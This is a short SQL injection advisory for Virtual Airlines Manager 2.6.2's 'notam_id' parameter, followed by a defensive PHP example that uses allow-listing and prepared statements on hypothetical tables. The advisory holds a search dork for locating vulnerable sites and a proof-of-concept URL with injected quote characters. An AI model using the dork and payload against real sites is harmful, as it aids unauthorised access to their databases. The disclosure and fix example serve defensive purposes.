
Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection





# Exploit Title: Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection
# Date: 2020-06-07
# Exploit Author: Pankaj Kumar Thakur
# Vendor Homepage: http://virtualairlinesmanager.net/
# Dork: inurl:notam_id=
# Affected Version: 2.6.2
# Tested on: Ubuntu
# CVE : N/A

Vulnerable parameter
-------------------
notam_id=%27%27

The notam_id parameter's value goes into the SQL query directly!

Proof of concept
---------------
https://localhost:8080/vam/index.php?page=notam&notam_id=11%27%27

Submitted: Jun 1 2020
Fixed: Jun 5 2020
Acknowledgement : https://ibb.co/Y3WYdFN
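How a handler can keep a value like notam_id out of the SQL text, shown as an added example that is not Virtual Airlines Manager's code or the vendor's actual fix. The `notams` table, its columns and `fetch_notam()` are hypothetical, and an in-memory SQLite database stands in for the application's database.

```php
<?php
// Added example: hypothetical schema and function names, constructed data.
// Requires the pdo_sqlite extension; runs offline from the command line.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE notams (notam_id INTEGER PRIMARY KEY, notam_text TEXT)');
$pdo->exec("INSERT INTO notams VALUES (11, 'Constructed sample NOTAM')");

/**
 * Look up one NOTAM by the raw request value.
 * Returns the row, or null when the value is not a valid id or no row exists.
 */
function fetch_notam(PDO $pdo, string $raw): ?array
{
    // Step 1: allow-list. The id must parse as a positive integer,
    // so quotes or any other non-digit characters are rejected here.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // Step 2: bound parameter. The value is sent separately from the
    // statement text, so it can never change the structure of the query.
    $stmt = $pdo->prepare(
        'SELECT notam_id, notam_text FROM notams WHERE notam_id = :id'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: a valid id, the decoded value from the proof of
// concept (11%27%27 is 11''), an empty value and a non-numeric value.
foreach (['11', "11''", '', 'abc'] as $raw) {
    $row = fetch_notam($pdo, $raw);
    printf("%-8s => %s\n", var_export($raw, true),
        $row !== null ? $row['notam_text'] : 'rejected or not found');
}
```

Either step alone stops the quote characters from reaching the query as SQL; using both means a later change to one of them does not reopen the hole.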

